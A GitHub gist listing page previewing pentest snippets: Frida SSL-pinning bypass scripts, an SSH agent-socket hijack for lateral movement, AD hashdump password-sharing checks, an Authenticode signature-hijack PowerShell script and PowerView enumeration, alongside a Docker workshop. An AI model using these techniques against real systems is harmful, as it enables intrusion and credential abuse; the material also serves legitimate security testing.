Skip to content

Instantly share code, notes, and snippets.

View interference-security's full-sized avatar

Abhineet Jayaraj interference-security

245 followers · 10 following
View GitHub Profile
@incogbyte
incogbyte / mixunpin.js
Last active May 2, 2024 07:03
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@leonjza
leonjza / DOCKER-IN-AN-HOUR.md
Last active January 30, 2023 10:55
Docker in an hour Workshop

docker-in-an-hour

@leonjza

Welcome to docker-in-an-hour! This is a "JIT" for docker, with many explanations being just enough to defend yourself. It is highly recommended that you go and at least Google some of the stuff here after doing the workshop. Read the official docs with real explanations.

toc

@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active July 22, 2024 14:11
Subdomain Wordlist
@tomnomnom
tomnomnom / google-copy.js
Created June 19, 2019 21:27
Bookmarklet to copy URLs from a Google search results page
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)
@cubehouse
cubehouse / pinning.js
Last active July 19, 2024 02:35
A Frida script to bypass SSL Pinning on Android. https://blog.jamie.holdings/2019/01/19/advanced-certificate-bypassing-in-android-with-frida/
// start with:
// frida -U -l pinning.js -f [APP_ID] --no-pause
Java.perform(function () {
console.log('')
console.log('===')
console.log('* Injecting hooks into common certificate pinning methods *')
console.log('===')
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
@rustymagnet3000
rustymagnet3000 / a_ios_introspection.md
Last active July 15, 2024 10:05
Static and Dynamic iOS inspection
@bandrel
bandrel / check_hashes.py
Last active February 2, 2023 15:55
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
@netbiosX
netbiosX / DigitalSignature-Hijack.ps1
Last active October 2, 2022 21:31
Hijack Digital Signatures and Bypass Authenticode Hash Validation
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active July 15, 2024 23:00
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server